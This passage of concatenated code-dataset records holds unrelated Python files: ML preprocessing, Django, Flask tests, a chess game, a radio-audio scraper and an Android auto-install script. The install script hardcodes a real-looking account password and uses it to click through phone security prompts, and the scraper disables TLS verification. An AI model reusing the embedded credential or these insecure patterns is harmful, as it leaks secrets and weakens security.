tf.subtract(\n center_x,\n 112)\n offset_width = tf.subtract(\n center_y,\n 112)\n target_height, target_width = target_image_size,\\\n target_image_size\n volume = tf.image.crop_to_bounding_box(\n volume,\n offset_height,\n offset_width,\n target_height,\n target_width)\n\n # for testing ucf-101. comment otherwise\n #volume = tf.slice(\n # volume,\n # [0, 0, 0, 0],\n # [64, 224, 224, 3])\n \n return volume\n\n\ndef preprocess_volume(volume,\n num_frames,\n height,\n width,\n is_training=False,\n target_image_size=224,\n use_bfloat16=False,\n list_of_augmentations=[]):\n\n '''Preprocess the given image.\n\n Args:\n 1. volume: Tensor representing an uint\\\n volume of arbitrary size\n 2. height: Tensor representing the original\\\n height of the volume\n 3. width: Tensor representing the original\\\n width of the volume\n 4. is_training: bool for whether the\\\n preprocessing is for training\n 5. target_image_size: int for representing input\\\n size to the model\n 6. num_frames: int for representing the\\\n number of frames in a volume\n 7. use_bfloat16: bool for whether to use\\\n bfloat16\n 8. list_of_augmentations: Specify augmentation\\\n schemes\n \n Returns:\n A preprossed image Tensor with value range\\\n of [-1, 1].\n '''\n \n # Get back actual volume shape\n if is_training:\n volume = tf.reshape(\n volume,\n [\n num_frames,\n height,\n width,\n 3])\n else:\n volume = tf.reshape(\n volume,\n [\n num_frames,\n height,\n width,\n 3])\n\n if is_training:\n func = preprocess_for_train\n else:\n func = preprocess_for_eval\n\n volume = func(\n volume,\n num_frames,\n height,\n width,\n target_image_size,\n list_of_augmentations)\n \n ##### Cast volume to float32\n volume = tf.cast(\n volume,\n tf.float32)\n\n ##### I3d takes input in range [-1, 1]\n volume = tf.subtract(\n tf.divide(\n volume,\n tf.constant(\n 127.5,\n dtype=tf.float32)),\n tf.constant(\n 1.,\n dtype=tf.float32))\n\n if use_bfloat16:\n ##### Conversion to bfloat16\n volume = tf.image.convert_image_dtype(\n volume,\n dtype=tf.bfloat16)\n\n return volume\n","sub_path":"action_recog/central_reservoir/augmentations/preprocessing_volume.py","file_name":"preprocessing_volume.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"1981866","text":"import cv2\r\nimport numpy as np\r\n\r\nwidth = 256\r\nheight = 256\r\n\r\n# uint8で0埋めの配列を作る。\r\n# 幅16、高さ24のサイズ\r\n# zeros(shape, type) shapeは配列の大きさ\r\n# 配列の(行数、列数)になっている\r\n# 画像はwidth,heightの慣習があるが、ココは逆なので気をつけること\r\nimageArray = np.zeros((height, width, 3), np.uint8)\r\nimageArray+=255\r\n# これでサイズを確認できます\r\n\r\nsize = imageArray.shape[:2]\r\nprint(size)\r\n\r\n\r\n# 0で埋められた配列を画像として保存します\r\ncv2.imwrite(\"white.png\", imageArray);\r\n","sub_path":"white.py","file_name":"white.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"330799453","text":"from django.contrib import admin\nfrom polymorphic.admin import PolymorphicParentModelAdmin, \\\n PolymorphicChildModelAdmin\nfrom fabled.course.models import *\n\nclass TextBlockAdmin(PolymorphicChildModelAdmin):\n base_model = TextBlock\n\nclass ImageBlockAdmin(PolymorphicChildModelAdmin):\n base_model = ImageBlock\n\nclass BlockParentAdmin(PolymorphicParentModelAdmin):\n base_model = Block\n child_models = (\n (TextBlock, TextBlockAdmin),\n (ImageBlock, ImageBlockAdmin)\n )\n\nadmin.site.register(Block, BlockParentAdmin)\nadmin.site.register(Course)\n","sub_path":"fabled/course/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"114597659","text":"from flask import url_for\nfrom tests.base import BaseTestCase\n\n\nclass MainTestCase(BaseTestCase):\n def test_index(self):\n response = self.client.get(url_for('main.index'))\n data = response.get_data(as_text=True)\n self.assertIn('登录', data)\n\n self.login()\n response = self.client.get(url_for('main.index'))\n data = response.get_data(as_text=True)\n self.assertNotIn('登录', data)\n","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"232560496","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import cm\nfrom matplotlib.patches import ConnectionPatch\n\n#%% Class for Fourier Series\n\nclass FS():\n \n def __init__(self, Circles, Cycles):\n \n self.Circles = Circles\n self.Cycles = Cycles\n \n #%% X coordinate of circle's center\n \n def Xcenter(self, n, theta):\n \n ''' \n X coordinate of n th circle\n '''\n \n Ans = 0\n \n if n > 0:\n for i in range(1, n + 1):\n Ans += (4/( (2*i - 1)* np.pi))* np.cos( (2*i - 1)* theta)\n \n return Ans\n \n #%% Y coordinate of circle's center\n \n def Ycenter(self, n, theta):\n \n ''' \n Y coordinate of n th circle\n '''\n \n Ans = 0\n \n if n > 0:\n for i in range(1, n + 1):\n Ans += (4/( (2*i - 1)* np.pi))* np.sin( (2*i - 1)* theta)\n \n return Ans\n \n #%% Radius of circle\n \n def Rds(self, n):\n \n ''' \n Radius of n th circle\n '''\n \n return 4/( (2*n + 1)* np.pi)\n \n #%% Plot\n \n def PlotFS(self):\n\n time = np.linspace(0, self.Cycles, self.Cycles* 70)\n \n fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(80, 60))\n fig.suptitle('Fourier Series', fontsize = 45, fontweight = 'bold')\n \n color = cm.rainbow( np.linspace(0, 1, self.Circles) )\n \n for t in time:\n \n thta = 2* np.pi* t\n \n #%% clear the plot\n axs[0].clear()\n \n if (t > 0):\n con.remove()\n \n #%% First plot\n \n for i, c in zip(range(0, self.Circles), color):\n xc = self.Xcenter(i, thta)\n yc = self.Ycenter(i, thta)\n R = self.Rds(i)\n \n crl = plt.Circle((xc, yc), R, color=c, alpha = 0.5, linewidth = 2)\n axs[0].add_artist(crl)\n \n if (i > 0):\n axs[0].plot([xco, xc], [yco, yc], color='b', linewidth = 2)\n \n xco = xc\n yco = yc\n Ro = R\n \n axs[0].axis('square')\n axs[0].set_xlim([ -9/np.pi, 9/np.pi ])\n axs[0].set_ylim([ -9/np.pi, 9/np.pi ])\n \n #%% Second plot\n \n if (t > 0):\n axs[1].plot([to,t], [ycirc, yc], color='m', linewidth = 1.5)\n \n to = t\n ycirc = yc\n \n axs[1].axis('square')\n axs[1].set_xlim([ 0, 18/np.pi ])\n axs[1].set_ylim([ -9/np.pi, 9/np.pi ])\n \n #%% Line\n \n con = ConnectionPatch( xyA = (t, yc), xyB = (xc, yc), \n coordsA = 'data', coordsB = 'data',\n axesA = axs[1], axesB = axs[0], \n color = 'red')\n axs[1].add_artist(con)\n \n plt.pause(1e-11)\n\n#%% Main\n\nif __name__ == '__main__':\n \n # Circles, Cycles\n fs = FS(8, 2)\n fs.PlotFS()\n","sub_path":"Physics/FS_square.py","file_name":"FS_square.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"21597781","text":"class Solution:\n def reorderLogFiles(self, logs: List[str]) -> List[str]:\n \n digit_logs = [i for i in logs if not i.split()[1][0].isalpha()] #split(\"\",1)\n letter_logs = [i for i in logs if i.split()[1][0].isalpha()]\n \n sort = []\n for i in letter_logs:\n a = i.split()\n b = a[1:] + [a[0]] # tuple 로 감싸면 어짜피 앞에서부터 비교한다.\n c = ' '.join(b)\n sort.append(c)\n \n sort.sort() # linting? sort를 변수로 쓰면 안됨. pep8 표준에 맞는 스타일. black app , linter : \n # typechecking, 안쓰는 변수, 밖에서 변수 호출 // flake8 pyiint mypy\n # python typing pep484\n \n answer = []\n \n for i in sort:\n a = i.split()\n b = [a[-1]] + a[:-1]\n c = ' '.join(b)\n answer.append(c)\n \n answer = answer + digit_logs\n \n return answer\n\n # 황규님 솔루션 보기, None도 안써도 괜찮음.\n # 스트링 사이즈에 따라서 NlogN이 아닐 수 있음.\n # 수진님 솔루션 보기\n # 원탁님 솔루션 비교\n # 진우님 솔루션이 최적화\n","sub_path":"LeetCode/Reorder Data in Log Files.py","file_name":"Reorder Data in Log Files.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"11349293","text":"#ITERATIVE PROGRAM\nimport re\ndef iterative_program():\n \"\"\"main function which has the core program (should be broken into smaller functions)\"\"\"\n user_input = re.sub( r'[^A-Za-z]', '', str(input(\"Please enter some text to check if it is a palindrome: \")))\n user_input_length = len(user_input)\n user_input_reverse = \"\"\n print(\"this is the ITERATIVE program!\")\n for counter in range(0, (user_input_length*-1)-1,-1):\n if counter == 0:\n user_input_reverse += user_input[-1:]\n elif counter == -1:\n continue\n else:\n user_input_reverse += user_input[counter: counter+1]\n theoretical_math_piece = ((str(str(re.match(str(user_input), str(user_input_reverse)))[24:34])) + \" )\")#the match reg ex function is applied to both the actual text and the reversed text and it compares the two and returns a math object based off of the result# after i recieve the math object i take out the span part of the object which looks similar to this <_sre.SRE_Match object; span=(4, 11), match='message'>\n actual_math_piece = (\"span=(0, \"+str(user_input_length)+\" )\")#this is the span part that should be generated if text is palandromic\n print(\"thats a palindrome!\") if actual_math_piece == theoretical_math_piece else print(\"nope that is not a palindrome!\")\niterative_program()\n\n#RECURSIVE PROGRAM\ndef recrursive_program():\n \"\"\"main function which has the core program\"\"\"\n counter = 0\n user_input = re.sub( r'[^A-Za-z]', '', str(input(\"Please enter some text to check if it is a palindrome: \")))\n user_input_reverse = \"\"\n user_input_length = len(user_input)\n print(\"this is the RECURSIVE program!\")\n def reverse_string(counter2, user_input2, user_input_reverse2, user_input_length2):\n \"\"\"this function reverses the string the user provides\"\"\"\n if counter2 == 0:\n user_input_reverse2 += user_input2[-1:]\n elif counter2 == -1:\n user_input_reverse2 = user_input_reverse2\n else:\n user_input_reverse2 = user_input_reverse2+user_input2[counter2: counter2+1]\n\n if counter2 >= ((user_input_length2*-1)+1):#BASE CASE\n reverse_string(counter2 - 1,user_input2, user_input_reverse2, user_input_length2)\n else:\n calculate_if_palindrome(counter2, user_input2, user_input_reverse2, user_input_length2)\n\n def calculate_if_palindrome(counter3, user_input3, user_input_reverse3, user_input_length3):\n \"\"\"this function compares the two strings that the user provides by using reg ex methods\"\"\"\n theoretical_math_piece = ((str(str(re.match(str(user_input3), str(user_input_reverse3)))[24:34])) + \" )\")#the match reg ex function is applied to both the actual text and the reversed text and it compares the two and returns a math object based off of the result# after i recieve the math object i take out the span part of the object which looks similar to this <_sre.SRE_Match object; span=(4, 11), match='message'>\n actual_math_piece = (\"span=(0, \"+str(user_input_length3)+\" )\")#this is the span part that should be generated if text is palandromic\n print(\"thats a palindrome!\") if actual_math_piece == theoretical_math_piece else print(\"nope that is not a palindrome!\")\n\n reverse_string(counter, user_input, user_input_reverse, user_input_length)\nrecrursive_program()\n","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"191485607","text":"from setuptools import setup\n\n# these lines allow the version to be specified in Makefile.private\nimport os\nversion = os.environ.get(\"MODULEVER\", \"0.0\")\n\nsetup(\n# install_requires = ['cothread'], # require statements go here\n name = 'dls_pi_piezo_scan',\n version = version,\n description = 'Module',\n author = 'tdq39642',\n author_email = 'tdq39642@fed.cclrc.ac.uk',\n packages = ['dls_pi_piezo_scan'],\n# entry_points = {'console_scripts': ['test-python-hello-world = dls_pi_piezo_scan.dls_pi_piezo_scan:main']}, # this makes a script\n# include_package_data = True, # use this to include non python files\n zip_safe = False\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"591317332","text":"import socket\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport os\nimport pprint\nfrom pprint import pprint\nimport gen_key\nfrom Crypto.PublicKey import RSA\n\n\nroot = Tk()\n\nimage_size = 64\n\nuser_player = None \t#Host plays white\n\t\t\t#White goes first\n\t\t\t#White plays from bottom (len(board)) to top (0).\n\n\n\n\nclass Board:\n\tdef __init__(self):\n\t\tself.canvas = Canvas(root, width=image_size*8, height=image_size*8)\n\t\tself.canvas.pack()\n\t\tself.canvas.bind(\"\",self.mouse_action)\n\n\t\tself.turn_text = Label(root,text = \"ERROR\")\n\t\tself.turn_text.pack()\n\n\t\tself.board = [[None]*8 for i in range(8)]\t#Note that the board is a list of lists\n\t\t\t\t\t\t\t\t#This means that the Y coordinates are the first coordinate of board\n\t\t\t\t\t\t\t\t#The X coordinate is the second coordinate of the board\n\t\t\t\t\t\t\t\t#A Y coordinate of 0 is the top\n\t\t\t\t\t\t\t\t#A Y coordinate of 7 is the bottom\n\t\t\t\t\t\t\t\t#Decreasing Ys moves the piece UP\n\t\t\n\t\tself.board[0][0] = Rook(\"guest\",(0,0))\n\t\tself.board[0][1] = Knight(\"guest\",(1,0))\n\t\tself.board[0][2] = Bishop(\"guest\",(2,0))\n\t\tself.board[0][3] = Queen(\"guest\",(3,0))\n\t\tself.board[0][4] = King(\"guest\",(4,0))\n\t\tself.board[0][5] = Bishop(\"guest\",(5,0))\n\t\tself.board[0][6] = Knight(\"guest\",(6,0))\n\t\tself.board[0][7] = Rook(\"guest\",(7,0))\n\t\t\n\t\tfor x in range(8):\n\t\t\tself.board[1][x] = Pawn(\"guest\",(x,1))\n\n\t\tself.board[7][0] = Rook(\"host\",(0,7))\n\t\tself.board[7][1] = Knight(\"host\",(1,7))\n\t\tself.board[7][2] = Bishop(\"host\",(2,7))\n\t\tself.board[7][3] = Queen(\"host\",(3,7))\n\t\tself.board[7][4] = King(\"host\",(4,7))\n\t\tself.board[7][5] = Bishop(\"host\",(5,7))\n\t\tself.board[7][6] = Knight(\"host\",(6,7))\n\t\tself.board[7][7] = Rook(\"host\",(7,7))\n\n\t\tfor x in range(8):\n\t\t\tself.board[6][x] = Pawn(\"host\",(x,6))\n\n\t\tself.guest_pieces = [self.board[i][j] for i in range(2) for j in range(8)]\n\t\tself.host_pieces = [self.board[6+i][j] for i in range(2) for j in range(8)]\n\t\t\n\t\tself.guest_king = self.board[0][4]\n\t\tself.host_king = self.board[7][4]\n\t\t\n\t\tself.selected_piece = None\n\t\tself.selected_image = ImageTk.PhotoImage(Image.open(\"../res/selected.png\").resize((image_size,image_size), Image.ANTIALIAS))\n\n\t\tself.move_coords = []\n\n\t\tself.redraw()\n\t\tif user_player == \"guest\":\n\t\t\tmove = link.get_move()\n\t\t\tself.move_piece(move[0],move[1])\n\t\t\tself.redraw()\n\t\t\tself.turn_text.config(text='Turn: You (Black')\n\t\telse:\n\t\t\tself.turn_text.config(text='Turn: You (White)')\n\n\n\tdef pieceAtLoc(self,piece,pos):\n\t\tif not (pos[0]>=0 and pos[0]=0 and pos[1]prime :\n condition = True\n print (i)\n for j in range(2,i):\n if i%j==0:\n condition = False\n if condition:\n prime = i\n\nprint(prime)\n","sub_path":"problem003.py","file_name":"problem003.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"203787925","text":"import argparse\nimport os\nimport time\nfrom logging import FileHandler\n\nfrom language.qa.dataset import build_dataset\nfrom language.qa.model import build_model\nfrom language.qa.utils.trainer import Trainer\nfrom language.qa.utils.evaluator import Evaluator\nfrom language.utils.log import get_logger\nfrom language.utils.config import get_cfg_defaults\nfrom language.utils.serialization import load_model\n\n\nlogger = get_logger()\n\n\ndef load_pretrain_model(model, pretrain_cfg):\n if pretrain_cfg is None:\n return model\n\n if 'resume' in pretrain_cfg:\n load_model(model, pretrain_cfg.resume, resume=True)\n elif 'load' in pretrain_cfg:\n load_model(model, pretrain_cfg.load)\n elif 'bert' in pretrain_cfg:\n model.load_bert_model(pretrain_cfg.bert)\n\n return model\n\n\ndef train(cfg):\n train_dataset = build_dataset(cfg.data, purpose='train')\n val_dataset = build_dataset(cfg.data, purpose='val')\n model = build_model(cfg.model, vocab=train_dataset.get_vocab())\n load_pretrain_model(model, cfg.pretrain)\n evaluator = Evaluator(cfg.evaluator, val_dataset)\n Trainer(cfg.trainer, evaluator, model, train_dataset, cfg.save.dir).train()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Train question answer model.')\n parser.add_argument('--config', required=True, type=str, help='Path to config.')\n args = parser.parse_args()\n\n cfg = get_cfg_defaults()\n cfg.merge_from_file(args.config)\n cfg.save.dir = os.path.join(cfg.save.dir, time.strftime(\"%Y%m%d%H%M%S\"))\n os.makedirs(cfg.save.dir, exist_ok=True)\n cfg.freeze()\n\n logger.addHandler(FileHandler(os.path.join(cfg.save.dir, f'train.log')))\n logger.info(f'Loading config {args.config}.')\n logger.info(f'Config:\\n {cfg}')\n train(cfg)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/train_qa.py","file_name":"train_qa.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"114200927","text":"import os\nimport time\nfrom multiprocessing import Pool\nimport uiautomator2 as u2\nimport subprocess\n\n\ndef conndevice(device):\n d = u2.connect(device)\n return d\n\n\n\ndef getDevicesAll():\n # 获取devices数量和名称\n devices = []\n try:\n for dName_ in os.popen(\"adb devices\"):\n if \"\\t\" in dName_:\n if dName_.find(\"emulator\") < 0:\n devices.append(dName_.split(\"\\t\")[0])\n devices.sort(cmp=None, key=None, reverse=False)\n print(devices)\n except:\n pass\n print(u\"\\n设备名称: %s \\n总数量:%s台\" % (devices, len(devices)))\n return devices\n\n\ndef check_screen_locked(device, d, times=1):\n try:\n if times >= 3:\n return False\n print('({}) <尝试{}次> 检查设备是否锁屏'.format(device, times))\n if d.info.get('screenOn') == True:\n print('({}) 设备是亮屏状态!'.format(device))\n d.press(\"power\")\n print('({}) 关闭屏幕一次!'.format(device))\n time.sleep(2)\n d.unlock()\n print('({}) 执行一次解锁'.format(device))\n d.press(\"home\")\n print('({}) 按一次home回到桌面'.format(device))\n return True\n else:\n print('({}) 设备是黑屏状态!'.format(device))\n d.unlock()\n print('({}) 直接执行解锁'.format(device))\n d.press(\"home\")\n print('({}) 按一次home回到桌面'.format(device))\n return True\n except Exception as e:\n print(e)\n return check_screen_locked(times=times + 1)\n\n\ndef input_autoinstall(device, d):\n try:\n devices_v = d.device_info[\"version\"]\n devices_version = devices_v[0:3]\n display = d.device_info[\"display\"]\n my_display = '{}*{}'.format(display[\"width\"], display[\"height\"])\n print('当前手机系统版本为 {}'.format(devices_version))\n print('检测是否是vivo或者OPPO手机 {}'.format(device))\n print('当前屏幕分辨率为 {}'.format(my_display))\n if d.device_info[\"brand\"] == 'vivo':\n print('检测到vivo手机 {}'.format(device))\n if float(devices_version) > 5 and float(devices_version) < 9:\n d(resourceId=\"vivo:id/vivo_adb_install_ok_button\").click()\n else:\n print('开始输入密码 {}'.format(device))\n d.xpath(\n '//*[@resource-id=\"com.bbk.account:id/dialog_pwd\"]/android.widget.LinearLayout[1]/android.widget.RelativeLayout[1]').set_text(\n \"Pokercity2019\")\n print('点击确认按钮 {}'.format(device))\n d(resourceId=\"android:id/button1\").click()\n print('等待10s检测应用安全性 {}'.format(device))\n d(resourceId=\"com.sohu.inputmethod.sogou.vivo:id/imeview_keyboard\").wait(timeout=10.0)\n print('点击安装按钮 {}'.format(device))\n d.click(0.497, 0.858)\n return True\n elif d.device_info[\"brand\"] == 'OPPO':\n print('检测到OPPO手机 {}'.format(device))\n print('开始输入密码 {}'.format(device))\n d(resourceId=\"com.coloros.safecenter:id/et_login_passwd_edit\").set_text(\"Pokercity2019\")\n print('点击确认按钮 {}'.format(device))\n d(resourceId=\"android:id/button1\").click()\n print('等待8s检测应用安全性 {}'.format(device))\n time.sleep(8)\n if d(text=\"发现广告插件\").exists:\n d.click(0.686, 0.929)\n time.sleep(2)\n d.click(0.482, 0.84)\n return True\n else:\n if float(devices_version) > 5 and float(devices_version) < 7:\n d.click(0.718, 0.957)\n return True\n elif float(devices_version) > 8 and float(devices_version) < 11:\n d.click(0.495, 0.954)\n return True\n elif float(devices_version) < 5.3 and float(devices_version) >= 5:\n d.click(0.498, 0.793)\n return True\n else:\n return True\n else:\n return True\n except Exception as e:\n print(e)\n return False\n\n\ndef quickinstall(device):\n packagename = \"com.saiyun.vtmjzz\"\n i = \"/Users/boke/Downloads/apk/mjzz_release_1.07_0727-appetizer.apk\"\n\n cmd = '{} -s {} {} {}'.format(\"adb\", device, \"install\", i)\n print(cmd)\n\n # 卸载原有apk\n d = u2.connect(device)\n try:\n os.system('adb -s ' + device + ' uninstall %s' % packagename)\n print(device + \" 卸载成功\\n\")\n except:\n print(device + \" 卸载失败\\n\")\n check_screen_locked(device, d)\n subprocess.Popen(cmd, shell=True)\n time.sleep(10)\n input_autoinstall(device, d)\n\n\n\n\ndef qainstall(devices):\n starting = time.time()\n pool = Pool() # 创建8个任务池\n result = pool.map(quickinstall, devices)\n entire = time.time()\n pool.close()\n print(entire - starting) # 打印时间\n\n\nif __name__ == \"__main__\":\n try:\n devices = getDevicesAll()\n except:\n print(\"获取设备出错\")\n try:\n qainstall(devices)\n except:\n print(\"进程出错\")\n","sub_path":"auto_install.py","file_name":"auto_install.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"231738827","text":"\ndef in_notebook():\n '''Simple function to check if module is loaded in a notebook'''\n try:\n __IPYTHON__\n return True\n except NameError:\n return False\n\n#Global variable to keep track of whether the output_notebook command was run \nbokeh_ouput_notebook_called = False\nmpl_ouput_notebook_called = False \n\ndef mpl_output_notebook():\n from IPython import get_ipython\n ipython = get_ipython()\n #ipython.magic('matplotlib inline')\n mpl_ouput_notebook_called = True\n\n#These are used for checking whether something is an instance of\n#an array or a number.\nimport numpy as np\nnumber_types = (int, float, np.int8, np.int16, np.int32, np.int64,\\\n np.uint8, np.uint16, np.uint32, np.uint64,\\\n np.float16, np.float32, np.float64\\\n )\nint_types = (int, np.int8, np.int16, np.int32, np.int64,\\\n np.uint8, np.uint16, np.uint32, np.uint64\\\n )\narray_types = (tuple, list, np.ndarray)","sub_path":"qexpy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"441441793","text":"import requests\nimport re\nimport os\nimport time\nimport random\n\nfrom fake_useragent import UserAgent\nfrom concurrent.futures import ThreadPoolExecutor\nfrom pydub import AudioSegment\n\n\ndef get_url():\n \"\"\"\n 获取每集的标题和对应的url\n :return:\n \"\"\"\n item = dict()\n url = '''http://pacc.radio.cn/sharenew/ondemand?ondemandId=1382204&type=1&offset={}&limit=30'''\n offset = 1\n while offset < 18:\n datas = requests.get(url.format(offset), headers={'User-Agent': UserAgent(verify_ssl=False).random}, verify=False).json()\n contents = datas['progarms']\n for content in contents:\n name = content['name']\n down_url = content['streamsm4a']\n print(name, down_url)\n item[name] = down_url\n offset += 1\n time.sleep(random.uniform(1, 1.5))\n return item\n\n\ndef down(url, name):\n \"\"\"\n 下载音频\n :param url: 音频url\n :param name: 音频名称\n :return:\n \"\"\"\n try:\n print(f'{name}开始保存!')\n path = os.path.join(file_path, f'{name}.m4a')\n name = re.sub(r'[\\\\/:?*\"<>\\n]', '', name)\n datas = requests.get(url, headers={'User-Agent': UserAgent(verify_ssl=False).random}, verify=False).content\n with open(path, 'wb') as f:\n f.write(datas)\n print(f'{name}下载成功!')\n except Exception as e:\n print(f'{name}保存失败!')\n\n\ndef process(file):\n \"\"\"\n 截取音频,从第15秒开始到除最后2分钟之间的音频\n :param file: 音频名称\n :return:\n \"\"\"\n print(f'正在处理{file}')\n # 截取名称,1.mp3-->1\n save_name = os.path.splitext(file)[0]\n # 加载文件\n song = AudioSegment.from_file(os.path.join(file_path, file), format='m4a')\n # 截取音频,最后8秒分贝降低\n without = song[15*1000:-120*1000].fade_out(8000)\n # 保存mp3\n without.export(os.path.join(save_path, f'{save_name}.mp3'), format='mp3')\n print(f'{file}处理完成!保存为{save_name}.mp3')\n\n\nif __name__ == '__main__':\n file_path = r'****'\n res = get_url()\n # 下载音频\n pool = ThreadPoolExecutor(3)\n for do_name, do_url in res.items():\n pool.submit(down, do_url, do_name)\n\n pool.shutdown(wait=True)\n # 处理音频\n pool_process = ThreadPoolExecutor(5)\n # path = r'E:\\Study\\项目\\008面试\\斗罗大陆'\n save_path = r'****'\n all_files = os.listdir(file_path)\n for in_file in all_files:\n pool_process.submit(process, in_file)\n\n pool_process.shutdown(wait=True)\n","sub_path":"云听斗罗大陆音频下载/yunting.py","file_name":"yunting.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"223144952","text":"# coding: utf-8\nimport TemplateListRenderMixin\nfrom base import BaseExtWindow\n\nclass PrintTemplateListMixin(object):\n u\"\"\"\n Миксин для наделения окна\n волшебной способностью генерировать кнопки\n для печатных форм.\n \"\"\"\n def __init__(self):\n assert isinstance(self, BaseExtWindow)\n self.PRINT_PARAMS = []\n assert isinstance(self, TemplateListRenderMixin)\n self.templates_list.append('PrintTemplateListMixin.js')\n\n def add_print_button(self, pack_shortname, grid=None, addmenu=None):\n u\"\"\"\n Создает кнопку для печатной формы.\n addmenu - указывает на создание меню(в любом случае, даже если в\n фикстурах будет всего один отчет)\n \"\"\"\n if grid is None:\n grid = getattr(self, 'grid', None)\n if not grid: # мы сделали все, что могли\n raise AttributeError('Error! Grid must be defined, not None!')\n\n handler = u\"\"\"\n function() {\n printDocument('%(url)s', '%(report_id)s', '%(pack_shortname)s', %(multiselect)s, '%(grid_id)s', %(not_need_selection)s)\n }\"\"\"\n self.print_element = get_report_laucher(\n pack_shortname, handler, ROUTER_SHORTNAME, grid.client_id, addmenu)\n grid.print_element = self.print_element\n if isinstance(grid, ExtMultiGroupinGrid):\n grid._top_bar.items.append(self.print_element)\n else:\n grid.top_bar.items.append(self.print_element)\n\n def add_print_params(self, fields):\n u\"\"\"\n Регистрируем поля,\n из которых будем брать значения\n при отправке запроса на печать.\n \"\"\"\n for fld in fields:\n self.PRINT_PARAMS.append(fld.client_id)","sub_path":"m3-blank/src/m3_blank/demo/PrintTemplateListMixin.py","file_name":"PrintTemplateListMixin.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"33796802","text":"from datetime import datetime\n\nfrom tablib import formats\n\nfrom brokerage.model import MatrixQuote\nfrom brokerage.quote_parser import QuoteParser, SpreadsheetReader, \\\n SimpleCellDateGetter\nfrom util.dateutils import date_to_datetime\nfrom util.monthmath import Month\nfrom util.units import unit_registry\n\n\nclass SparkMatrixParser(QuoteParser):\n NAME = 'spark'\n reader = SpreadsheetReader(formats.xlsx)\n\n HEADER_ROW = 7\n RCA_COLS = ['A', 'B', 'C', 'E']\n START_COL = 'F'\n VOLUME_RANGE_COL = 'H'\n PRICE_COLS = reader.column_range('I', 'M')\n\n EXPECTED_SHEET_TITLES = [ 'LED Matrix' ]\n SHEET = 'LED Matrix'\n\n EXPECTED_CELLS = [\n (SHEET, 2, 'A', 'Effective Date'),\n (SHEET, HEADER_ROW, 'A', 'STATE'),\n (SHEET, HEADER_ROW, 'B', 'UTILITY'),\n (SHEET, HEADER_ROW, 'C', 'LOAD ZONE'),\n (SHEET, HEADER_ROW, 'E', 'PROFILES'),\n (SHEET, HEADER_ROW, START_COL, 'START DATE'),\n (SHEET, HEADER_ROW, VOLUME_RANGE_COL, 'ANNUAL USAGE.*'),\n ]\n\n date_getter = SimpleCellDateGetter(SHEET, 3, 'A', None)\n\n ROUNDING_DIGITS = 4\n\n def _extract_quotes(self):\n for row in xrange(self.HEADER_ROW + 1,\n self.reader.get_height(self.SHEET) + 1):\n rate_class_alias = '-'.join(self.reader.get(\n self.SHEET, row, col, basestring) for col in self.RCA_COLS)\n start_from = self.reader.get(\n self.SHEET, row, self.START_COL, datetime)\n start_until = date_to_datetime((Month(start_from) + 1).first)\n\n min_vol, limit_vol = self._extract_volume_range(\n self.SHEET, row, self.VOLUME_RANGE_COL,\n '(?P[\\d,]+) to (?P[\\d,]+)', fudge_low=True,\n expected_unit=unit_registry.kWh)\n\n for col in self.PRICE_COLS:\n term = self.reader.get_matches(\n self.SHEET, self.HEADER_ROW, col, '(\\d+) MTHS', int)\n price = self.reader.get(self.SHEET, row, col, float)\n yield MatrixQuote(start_from=start_from,\n start_until=start_until, term_months=term,\n valid_from=self._valid_from, valid_until=self._valid_until,\n min_volume=min_vol, limit_volume=limit_vol,\n rate_class_alias=rate_class_alias, price=price,\n service_type='electric', file_reference='%s %s,%s,%s' % (\n self.file_name, self.SHEET, row, col))\n","sub_path":"brokerage/quote_parsers/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"291675807","text":"import logging\n\nfrom . import bot\nfrom .config import config\nfrom . import channel\n\n\ndef main(config_overrides=[], quiet=False):\n for override in config_overrides:\n key, value = override\n section, key = key.rsplit('.', 1)\n config[section][key] = value\n\n handlers = []\n if not quiet:\n handlers.append(logging.StreamHandler())\n handlers.append(logging.FileHandler(config.logging['file']))\n\n logging.basicConfig(\n level=config.logging['level'].upper(),\n 